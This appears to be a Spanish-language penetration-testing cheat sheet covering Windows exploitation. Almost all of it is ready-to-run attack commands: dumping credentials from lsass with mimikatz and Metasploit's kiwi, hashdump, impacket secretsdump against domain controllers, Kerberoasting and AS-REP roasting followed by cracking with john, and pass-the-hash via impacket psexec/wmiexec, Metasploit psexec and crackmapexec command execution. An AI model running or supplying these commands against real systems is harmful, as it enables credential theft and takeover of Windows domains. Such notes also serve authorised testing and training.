3 Explotacion

Dumping passwords/hashes #

Para obtener hashes con kiwi o mimikatz es posible que se requieran privilegios elevados

Módulo kiwi metasploit #

A través de metasploit se puede cargar el módulo kiwi (mimikatz integrado en metasploit). Teniendo una sesión de meterpreter.

pgrep lsass
migrate <PID de lsass>
load kiwi

###### PARA VER TODAS LAS OPCIONES ESCRIBIMOS UN "'?"
### OPCIONES INTERESANTES
creds_all #si hay alguna en texto plano lo mostrará
creds_kerberos
password_change
lsa_dump_secrets
wifi_list

Mimikatz #

Otra manera es con mimikatz de manera nativa, se puede subir a través de un meterpreter, o con certutil. Mimikatz por defecto en kali se encuentra en: /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

Una vez ejecutado:

privilege::debug 
## Si nos devielve Privilege '20' OK está todo correcto

####COMANDOS INTERESANTES
lsadump::sam
lsadump::secrets
sekurlsa:logonpasswords #si hay alguna en texto plano lo mostrará

Con meterpreter #

hashdump

Ataque TGT con impacket #

si tenemos una pareja de credenciales (user/pass), podemos intentar obtener todos los hashes de los usuarios del dominio, incluido el del administrador.

#opcion1
impacket-secretsdump -just-dc usuario@ip (SAM HASH, para pass-the-hash)

#opcion2
impacket-GetUserSPNs dominio/usuario:contraseña -request (para john)

NOT-PREAUTH Attack Impacket #

Cuando detectamos usuarios en un dominio que tienen el NOT-PREAUTH, podemos intentar obtener el hash de su contraseña para luego crackearla con john the ripper.

#opcion1
impacket-GetNPUsers <dominio>/<usuario> -no-pass

#opcion2
impacket-GetNPUsers <dominio>/ -no-pass -usersfile usuarios.txt
#Con el hash obtenido, lo pasamos por john
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Pass-the-hash #

Poemos intentar acceder al dominio sin necesidad de crackear la contraseña, solamente teniendo el hash, haciendo un pass the hash

impacket #

#opcion 1
impacket-psexec usuario@ip -hashes <hash en cadena de texto>

#opcion 2
impacket-wmiexec <dominio>/user@ip -hashes <hash en cadena de texto>

### EJEMPLO
impacket-psexec Administrator@10.10.10.4 -hashes aaeeff31234aaaadddsfee345:2345:addfbbe

Metasploit psexec #

use exploit/windows/smb/psexec
# RELLENAR OPCIONES, PERO LAS IMPORTANTES SON
SMBuser
SMBPass ##AQUI INTRODUCIMOS EL NTML HASH O NT HASH
set target Command (y si no funciona probar otro target)
exploit

Crackmapexec #

##`PROBAR QUE FUNCIONA
#RESPETAR COMILLAS
crackmapexec smb <target IP> -u <user> -H "hash" 

## EJECUTAR COMANDOS
crackmapexec smb <target IP> -u <user> -H "hash"  -x "ipconfig"